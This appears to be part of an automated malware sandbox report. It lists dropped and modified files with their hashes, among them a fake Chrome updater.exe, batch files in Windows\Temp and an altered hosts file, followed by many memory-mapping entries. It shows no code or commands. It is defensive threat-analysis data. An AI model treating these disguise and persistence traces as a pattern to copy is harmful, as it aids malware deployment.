                                                Network

                                                MITRE ATT&CK Enterprise v6

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Program Files\Google\Chrome\updater.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  0472d36671fd6602ad4b1a6290f650d3

                                                  SHA1

                                                  12a95224d186a6ae001ef3f2cc80c737c35182a1

                                                  SHA256

                                                  7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                                  SHA512

                                                  30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                                • C:\Program Files\Google\Chrome\updater.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  0472d36671fd6602ad4b1a6290f650d3

                                                  SHA1

                                                  12a95224d186a6ae001ef3f2cc80c737c35182a1

                                                  SHA256

                                                  7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                                  SHA512

                                                  30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  3KB

                                                  MD5

                                                  8592ba100a78835a6b94d5949e13dfc1

                                                  SHA1

                                                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                  SHA256

                                                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                  SHA512

                                                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  b1b8f42ce123fea90f53e87678621e4c

                                                  SHA1

                                                  84d73e4f8a2a21fad433bfabb663fa3fe592d551

                                                  SHA256

                                                  aa6977d635d7512ed47cc56185bafc7c0f0c1eaf4b7be1d94951dc119d3b7305

                                                  SHA512

                                                  26b92c5ff67adf8d6426d1377024fed7903749c5f791594151fe9b81bdd45604dc05f842a4ca459c692f049238ad2b61c3b1c12199b8f99dc1cb490f3338a951

                                                • C:\Windows\Temp\lol.bat
                                                  Filesize

                                                  59B

                                                  MD5

                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                  SHA1

                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                  SHA256

                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                  SHA512

                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                • C:\Windows\Temp\run.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  731afe244b2414169a5f630d52646e56

                                                  SHA1

                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                  SHA256

                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                  SHA512

                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  0472d36671fd6602ad4b1a6290f650d3

                                                  SHA1

                                                  12a95224d186a6ae001ef3f2cc80c737c35182a1

                                                  SHA256

                                                  7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                                  SHA512

                                                  30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  0472d36671fd6602ad4b1a6290f650d3

                                                  SHA1

                                                  12a95224d186a6ae001ef3f2cc80c737c35182a1

                                                  SHA256

                                                  7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                                  SHA512

                                                  30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  3KB

                                                  MD5

                                                  5d574dc518025fad52b7886c1bff0e13

                                                  SHA1

                                                  68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

                                                  SHA256

                                                  755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

                                                  SHA512

                                                  21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  e2d46bffd1d9300639cac360fac02cb4

                                                  SHA1

                                                  fd2b4813c8ab610294b6759192ca05bad5bb8958

                                                  SHA256

                                                  94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3

                                                  SHA512

                                                  54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535

                                                • C:\Windows\system32\drivers\etc\hosts
                                                  Filesize

                                                  2KB

                                                  MD5

                                                  c5227366b7a688ff23b01788718251aa

                                                  SHA1

                                                  9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                                  SHA256

                                                  789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                                  SHA512

                                                  8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                                • memory/60-613-0x0000000000000000-mapping.dmp
                                                • memory/928-330-0x0000000000000000-mapping.dmp
                                                • memory/952-331-0x0000000000000000-mapping.dmp
                                                • memory/1016-323-0x0000000000000000-mapping.dmp
                                                • memory/1128-340-0x0000000000000000-mapping.dmp
                                                • memory/1204-228-0x000001E100AE0000-0x000001E100EFE000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/1204-210-0x000001E165940000-0x000001E165D5E000-memory.dmp
                                                  Filesize

                                                  4.1MB

                                                • memory/1304-326-0x0000000000000000-mapping.dmp
                                                • memory/1348-187-0x0000000000000000-mapping.dmp
                                                • memory/1484-327-0x0000000000000000-mapping.dmp
                                                • memory/1524-335-0x0000000000000000-mapping.dmp
                                                • memory/1636-337-0x0000000000000000-mapping.dmp
                                                • memory/1780-334-0x0000000000000000-mapping.dmp
                                                • memory/1784-614-0x0000000000000000-mapping.dmp
                                                • memory/1832-328-0x0000000000000000-mapping.dmp
                                                • memory/1932-604-0x0000000000000000-mapping.dmp
                                                • memory/2180-350-0x0000000000000000-mapping.dmp
                                                • memory/2180-329-0x0000000000000000-mapping.dmp
                                                • memory/2188-605-0x0000000000000000-mapping.dmp
                                                • memory/2208-618-0x0000000000000000-mapping.dmp
                                                • memory/2268-628-0x0000020D1F0A0000-0x0000020D1F0A7000-memory.dmp
                                                  Filesize

                                                  28KB

                                                • memory/2268-611-0x0000020D1F7C0000-0x0000020D1F7C6000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/2272-600-0x0000000000000000-mapping.dmp
                                                • memory/2420-352-0x0000000000000000-mapping.dmp
                                                • memory/2624-357-0x0000000000000000-mapping.dmp
                                                • memory/2664-615-0x0000000000000000-mapping.dmp
                                                • memory/2700-332-0x0000000000000000-mapping.dmp
                                                • memory/2852-333-0x0000000000000000-mapping.dmp
                                                • memory/2892-345-0x0000000000000000-mapping.dmp
                                                • memory/2976-186-0x0000000000000000-mapping.dmp
                                                • memory/3036-177-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-137-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-163-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-155-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-164-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-167-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-170-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-168-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-169-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-166-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-165-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-171-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-173-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-172-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-174-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-176-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-175-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-146-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-178-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-179-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-180-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-181-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-182-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-145-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-143-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-160-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-141-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-129-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-128-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-142-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-140-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-144-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-147-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-138-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-132-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-134-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-126-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-127-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-150-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-121-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-136-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-139-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-135-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-162-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-133-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-161-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-125-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-159-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-130-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-158-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-156-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-154-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-131-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-119-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-153-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-152-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-124-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-122-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-120-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-157-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-123-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-151-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-148-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3036-149-0x0000000077440000-0x00000000775CE000-memory.dmp
                                                  Filesize

                                                  1.6MB

                                                • memory/3892-353-0x0000000000000000-mapping.dmp
                                                • memory/4000-251-0x0000000000000000-mapping.dmp
                                                • memory/4000-262-0x00000283EB8D0000-0x00000283EB8F2000-memory.dmp
                                                  Filesize

                                                  136KB

                                                • memory/4000-269-0x00000283EBA80000-0x00000283EBAF6000-memory.dmp
                                                  Filesize

                                                  472KB

                                                • memory/4060-322-0x0000000000000000-mapping.dmp
                                                • memory/4072-218-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4072-214-0x0000000000400000-0x0000000001063000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/4072-183-0x0000000000000000-mapping.dmp
                                                • memory/4072-199-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4072-197-0x0000000000400000-0x0000000001063000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/4280-608-0x0000000000000000-mapping.dmp
                                                • memory/4316-379-0x0000000000000000-mapping.dmp
                                                • memory/4316-590-0x0000000000000000-mapping.dmp
                                                • memory/4340-382-0x0000000000000000-mapping.dmp
                                                • memory/4340-592-0x0000000000000000-mapping.dmp
                                                • memory/4344-591-0x0000000000000000-mapping.dmp
                                                • memory/4364-383-0x0000000000000000-mapping.dmp
                                                • memory/4384-384-0x0000000000000000-mapping.dmp
                                                • memory/4400-593-0x0000000000000000-mapping.dmp
                                                • memory/4408-385-0x0000000000000000-mapping.dmp
                                                • memory/4412-594-0x0000000000000000-mapping.dmp
                                                • memory/4440-595-0x0000000000000000-mapping.dmp
                                                • memory/4448-388-0x0000000000000000-mapping.dmp
                                                • memory/4460-597-0x0000000000000000-mapping.dmp
                                                • memory/4472-596-0x0000000000000000-mapping.dmp
                                                • memory/4476-391-0x0000000000000000-mapping.dmp
                                                • memory/4488-598-0x0000000000000000-mapping.dmp
                                                • memory/4496-392-0x0000000000000000-mapping.dmp
                                                • memory/4500-599-0x0000000000000000-mapping.dmp
                                                • memory/4504-601-0x0000000000000000-mapping.dmp
                                                • memory/4524-393-0x0000000000000000-mapping.dmp
                                                • memory/4560-396-0x0000000000000000-mapping.dmp
                                                • memory/4588-397-0x0000000000000000-mapping.dmp
                                                • memory/4604-584-0x0000000000000000-mapping.dmp
                                                • memory/4608-617-0x0000000000000000-mapping.dmp
                                                • memory/4628-583-0x0000000000000000-mapping.dmp
                                                • memory/4652-620-0x0000000000000000-mapping.dmp
                                                • memory/4764-629-0x0000000140000000-0x0000000140809000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/4764-627-0x0000000140000000-0x0000000140809000-memory.dmp
                                                  Filesize

                                                  8.0MB

                                                • memory/4824-621-0x0000000000000000-mapping.dmp
                                                • memory/4880-428-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4880-418-0x0000000000000000-mapping.dmp
                                                • memory/4880-422-0x0000000000400000-0x0000000001063000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/4880-423-0x00007FF8D3620000-0x00007FF8D37FB000-memory.dmp
                                                  Filesize

                                                  1.9MB

                                                • memory/4880-424-0x0000000000400000-0x0000000001063000-memory.dmp
                                                  Filesize

                                                  12.4MB

                                                • memory/4936-603-0x000001C3187E0000-0x000001C3187F2000-memory.dmp
                                                  Filesize

                                                  72KB

                                                • memory/4936-602-0x000001C318450000-0x000001C318456000-memory.dmp
                                                  Filesize

                                                  24KB

                                                • memory/5000-586-0x0000000000000000-mapping.dmp
                                                • memory/5032-587-0x0000000000000000-mapping.dmp
                                                • memory/5044-436-0x0000000000000000-mapping.dmp
                                                • memory/5044-492-0x000002527B0A0000-0x000002527B0AA000-memory.dmp
                                                  Filesize

                                                  40KB

                                                • memory/5044-453-0x000002527B080000-0x000002527B09C000-memory.dmp
                                                  Filesize

                                                  112KB

                                                • memory/5044-459-0x000002527B710000-0x000002527B7C9000-memory.dmp
                                                  Filesize

                                                  740KB

                                                • memory/5052-589-0x0000000000000000-mapping.dmp
                                                • memory/5104-588-0x0000000000000000-mapping.dmp